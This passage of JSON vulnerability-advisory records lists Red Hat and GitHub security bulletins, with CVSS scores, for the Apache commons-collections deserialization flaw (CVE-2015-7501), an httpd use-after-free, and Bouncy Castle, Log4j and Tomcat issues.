"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-19T09:11:45", "type": "redhat", "title": "(RHSA-2020:4274) Important: rh-maven35-apache-commons-collections4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2020-10-19T09:34:27", "id": "RHSA-2020:4274", "href": "https://access.redhat.com/errata/RHSA-2020:4274", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss SOA Platform 5.3.1 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-25T20:36:54", "type": "redhat", "title": "(RHSA-2015:2516) Critical: Red Hat JBoss SOA Platform 5.3.1 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:57", "id": "RHSA-2015:2516", "href": "https://access.redhat.com/errata/RHSA-2015:2516", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. 
(CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BRMS 6.1.0 as provided from the Red\nHat Customer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-08T16:09:30", "type": "redhat", "title": "(RHSA-2015:2578) Critical: Red Hat JBoss BRMS 6.1.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:26", "id": "RHSA-2015:2578", "href": "https://access.redhat.com/errata/RHSA-2015:2578", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "The Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. 
A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of rh-java-common-apache-commons-collections are advised to\nupgrade to these updated packages, which contain a backported patch to\ncorrect this issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T00:00:00", "type": "redhat", "title": "(RHSA-2015:2523) Important: rh-java-common-apache-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": 
"2018-06-12T21:28:21", "id": "RHSA-2015:2523", "href": "https://access.redhat.com/errata/RHSA-2015:2523", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Portal is the open source implementation of the Java EE suite\nof services and Portal services running atop Red Hat JBoss Enterprise\nApplication Platform.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw can be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Portal 6.2.0 as provided from the Red Hat\nCustomer Portal are advised to install this security patch.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T20:22:06", "type": "redhat", "title": "(RHSA-2015:2537) Critical: Red Hat JBoss Portal 6.2.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:40", "id": "RHSA-2015:2537", "href": "https://access.redhat.com/errata/RHSA-2015:2537", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T20:21:51", "type": "redhat", "title": "(RHSA-2015:2536) Critical: Red Hat JBoss Enterprise Application Platform 6.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:41:56", "id": "RHSA-2015:2536", "href": "https://access.redhat.com/errata/RHSA-2015:2536", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform 5 is a platform for Java\napplications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red Hat\nEnterprise Linux 4, 5, and 6 are advised to upgrade to these updated\npackages. 
The JBoss server process must be restarted for the update to\ntake effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T00:00:00", "type": "redhat", "title": "(RHSA-2015:2535) Critical: Red Hat JBoss Enterprise Application Platform 5.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:37:44", "id": "RHSA-2015:2535", "href": "https://access.redhat.com/errata/RHSA-2015:2535", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Data Grid is a distributed in-memory data grid, based on\nInfinispan.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. 
(CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Data Grid 6.4.1 and 6.5.1 as provided from\nthe Red Hat Customer Portal are advised to install this security patch.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-20T18:21:14", "type": "redhat", "title": "(RHSA-2015:2502) Critical: Red Hat JBoss Data Grid 6.4.1 and 6.5.1 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:57", "id": "RHSA-2015:2502", "href": "https://access.redhat.com/errata/RHSA-2015:2502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. 
A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BRMS 5.3.1 as provided from the Red Hat Customer\nPortal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-18T21:10:10", "type": "redhat", "title": "(RHSA-2015:2670) Critical: Red Hat JBoss BRMS 5.3.1 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:08", "id": "RHSA-2015:2670", "href": "https://access.redhat.com/errata/RHSA-2015:2670", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "JBoss Operations Network provides an integrated solution for managing\nJBoss middleware, other network infrastructure, and applications built\non Red Hat Enterprise Application Platform (EAP). 
The Apache Commons\nCollections library provides new interfaces, implementations, and\nutilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.2.3 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-04T16:53:21", "type": "redhat", "title": "(RHSA-2015:2547) Critical: Red Hat JBoss Operations Network 3.2.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:08", "id": "RHSA-2015:2547", "href": "https://access.redhat.com/errata/RHSA-2015:2547", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-29T10:41:39", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe following packages have been upgraded to a later upstream version: httpd24-httpd (2.4.27). (BZ#1461819)\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.\n\nBug Fix(es):\n\n* The httpd package installation script tried to create both the \"apache\" user and group in a single \"useradd\" command. Consequently, when the \"apache\" group had already been created on the system, the command failed, and the \"apache\" user was not created. To fix this bug, the \"apache\" group is now created by a separate command, and the \"apache\" user is correctly created during httpd installation even when the \"apache\" group exists. (BZ#1486843)\n\n* When installing the httpd24 Software Collection using the \"yum\" command, if the \"apache\" group already existed on the system with GID other than 48, the \"apache\" user was not created. This update fixes the bug. (BZ#1487164)\n\n* With this update, it is possible to run the mod_rewrite external mapping program as a non-root user. (BZ#1486832)\n\n* On a Red Hat Enterprise Linux 6 system, when the httpd service was stopped twice in a row by running the \"service httpd stop\" command, a misleading message was returned: \"Stopping httpd: [FAILED]\". This bug has been fixed. 
(BZ#1418395)\n\n* When the \"service httpd24-httpd graceful\" command was used on Red Hat Enterprise Linux 7 while the httpd24-httpd service was not running, the daemon was started without being tracked by systemd. As a consequence, the daemon ran in an incorrect SELinux domain. This bug has been fixed, and the httpd daemon runs in the correct SELinux domain in the described scenario. (BZ#1440858)\n\nEnhancement(s):\n\n* With this update, the mod_ssl module supports the ALPN protocol on Red Hat Enterprise Linux 7.4 and later versions. (BZ#1327548)\n\nFor further details, see the Red Hat Software Collections 3.0 Release Notes linked from the References section.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-10-24T08:16:35", "type": "redhat", "title": "(RHSA-2017:3018) Moderate: httpd24 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2018-06-12T21:28:16", "id": "RHSA-2017:3018", "href": "https://access.redhat.com/errata/RHSA-2017:3018", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-29T10:41:39", "description": "The httpd packages provide 
the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-10-11T15:17:48", "type": "redhat", "title": "(RHSA-2017:2882) Moderate: httpd security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2018-04-11T23:32:53", "id": "RHSA-2017:2882", "href": "https://access.redhat.com/errata/RHSA-2017:2882", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2023-12-06T17:30:36", "description": "The Bouncy Castle Java library before 1.51 does not validate that a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key 
exchanges, aka an \"invalid curve attack.\"", "cvss3": {}, "published": "2018-10-17T16:27:50", "type": "github", "title": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2023-01-09T05:02:41", "id": "GHSA-4MV7-CQ75-3QJM", "href": "https://github.com/advisories/GHSA-4mv7-cq75-3qjm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T17:28:33", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. 
A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:25:20", "type": "github", "title": "Deserialization of Untrusted Data in Apache commons collections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2023-11-02T22:53:04", "id": "GHSA-FJQ5-5J5F-MVXH", "href": "https://github.com/advisories/GHSA-fjq5-5j5f-mvxh", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:30:19", "description": "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-06T18:43:38", "type": "github", "title": "Deserialization of Untrusted Data in Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5645"], "modified": "2023-02-01T05:02:44", "id": "GHSA-FXPH-Q3J8-MV87", "href": "https://github.com/advisories/GHSA-fxph-q3j8-mv87", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-08T23:28:05", "description": "When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. 
